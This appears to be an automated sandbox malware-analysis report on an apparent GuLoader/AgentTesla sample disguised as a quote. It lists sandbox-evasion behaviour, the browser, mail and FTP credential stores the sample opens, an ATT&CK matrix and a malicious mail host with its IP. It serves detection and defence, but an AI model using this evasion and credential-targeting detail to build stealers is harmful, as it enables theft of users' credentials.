              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Quote_220072.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\Desktop\Quote_220072.exeAPI/Special instruction interceptor: Address: 5BF8E40
              Source: C:\Users\user\Desktop\Quote_220072.exeAPI/Special instruction interceptor: Address: 27B8E40
              Source: C:\Users\user\Desktop\Quote_220072.exeRDTSC instruction interceptor: First address: 5BA014C second address: 5BA014C instructions: 0x00000000 rdtsc 0x00000002 test ebx, 6315EE0Eh 0x00000008 test bh, bh 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F27F4CC3B9Fh 0x0000000e test dx, ax 0x00000011 inc ebp 0x00000012 inc ebx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\Quote_220072.exeRDTSC instruction interceptor: First address: 276014C second address: 276014C instructions: 0x00000000 rdtsc 0x00000002 test ebx, 6315EE0Eh 0x00000008 test bh, bh 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F27F4C8B41Fh 0x0000000e test dx, ax 0x00000011 inc ebp 0x00000012 inc ebx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\Quote_220072.exeMemory allocated: 34880000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeMemory allocated: 348A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeMemory allocated: 368A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeWindow / User API: threadDelayed 4030Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\Quote_220072.exeEvaded block: after key decisiongraph_0-3126
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8060Thread sleep count: 252 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8060Thread sleep count: 4030 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -99891s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -99766s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -99641s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -99531s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -99422s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -99313s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -99188s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -99063s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -98953s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -98844s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -98719s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -98610s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -98485s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -98360s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -98235s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -98110s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -97985s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -97860s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\Quote_220072.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\Quote_220072.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F7
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 0_2_004065AD FindFirstFileW,FindClose,0_2_004065AD
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 99891Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 99766Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 99641Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 99531Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 99422Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 99313Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 99188Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 99063Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 98953Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 98844Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 98719Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 98610Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 98485Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 98360Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 98235Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 98110Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 97985Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 97860Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: Quote_220072.exe, 00000005.00000002.2567555318.000000000438D000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000002.2567555318.0000000004338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Quote_220072.exeAPI call chain: ExitProcess graph end nodegraph_0-3014
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 0_2_6FF82351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FF82351
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeProcess created: C:\Users\user\Desktop\Quote_220072.exe "C:\Users\user\Desktop\Quote_220072.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeQueries volume information: C:\Users\user\Desktop\Quote_220072.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036DA
              Source: C:\Users\user\Desktop\Quote_220072.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000005.00000002.2585874253.00000000348FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2585874253.00000000348A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Quote_220072.exe PID: 7888, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Quote_220072.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Users\user\Desktop\Quote_220072.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: Yara matchFile source: 00000005.00000002.2585874253.00000000348A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Quote_220072.exe PID: 7888, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000005.00000002.2585874253.00000000348FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2585874253.00000000348A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Quote_220072.exe PID: 7888, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              1
              Masquerading
              2
              OS Credential Dumping
              311
              Security Software Discovery
              Remote Services1
              Email Collection
              11
              Encrypted Channel
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Native API
              Boot or Logon Initialization Scripts11
              Process Injection
              1
              Disable or Modify Tools
              1
              Credentials in Registry
              141
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              1
              Non-Standard Port
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              141
              Virtualization/Sandbox Evasion
              Security Account Manager1
              Application Window Discovery
              SMB/Windows Admin Shares2
              Data from Local System
              1
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Access Token Manipulation
              NTDS3
              File and Directory Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Process Injection
              LSA Secrets225
              System Information Discovery
              SSHKeylogging23
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Obfuscated Files or Information
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Quote_220072.exe55%ReversingLabsWin32.Trojan.GuLoader
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://apis.google.com0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              drive.google.com
              172.217.18.14
              truefalse
                unknown
                drive.usercontent.google.com
                142.250.185.193
                truefalse
                  unknown
                  mail.mbarieservicesltd.com
                  199.79.62.115
                  truetrue
                    unknown
                    default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                    84.201.210.22
                    truefalse
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.google.comQuote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://drive.usercontent.google.com/yQuote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000002.2567555318.000000000439D000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://drive.usercontent.google.com/Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775266109.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://apis.google.comQuote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://nsis.sf.net/NSIS_Error...Quote_220072.exefalse
                              unknown
                              https://drive.google.com/Quote_220072.exe, 00000005.00000002.2567555318.0000000004338000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://drive.usercontent.google.com/tQuote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000002.2567555318.000000000439D000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://mail.mbarieservicesltd.comQuote_220072.exe, 00000005.00000002.2585874253.00000000348FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    142.250.185.193
                                    drive.usercontent.google.comUnited States
                                    15169GOOGLEUSfalse
                                    199.79.62.115
                                    mail.mbarieservicesltd.comUnited States
                                    394695PUBLIC-DOMAIN-REGISTRYUStrue
                                    172.217.18.14
                                    drive.google.comUnited States
                                    15169GOOGLEUSfalse
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1546663
                                    Start date and time:2024-11-01 12:14:07 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 27s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:10
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Quote_220072.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@3/12@3/3
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 86%
                                    • Number of executed functions: 57
                                    • Number of non-executed functions: 15
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: Quote_220072.exe
                                    TimeTypeDescription
                                    07:15:43API Interceptor19x Sleep call for process: Quote_220072.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    199.79.62.115TT Copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      24-17745.exeGet hashmaliciousAgentTeslaBrowse
                                        PO# 4507573387.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                          PO-000041522.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            MA2402201136.exeGet hashmaliciousAgentTeslaBrowse
                                              IMG0001.exeGet hashmaliciousAgentTeslaBrowse
                                                PURCHASE ORDER-6350-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                  order2024-10-07_174915.exeGet hashmaliciousAgentTeslaBrowse
                                                    PO23100070.exeGet hashmaliciousAgentTeslaBrowse
                                                      PO-000001488.exeGet hashmaliciousAgentTeslaBrowse
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        mail.mbarieservicesltd.comTT Copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 199.79.62.115
                                                        24-17745.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 199.79.62.115
                                                        PO# 4507573387.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                        • 199.79.62.115
                                                        PO-000041522.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 199.79.62.115
                                                        MA2402201136.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 199.79.62.115
                                                        IMG0001.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 199.79.62.115
                                                        PURCHASE ORDER-6350-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 199.79.62.115
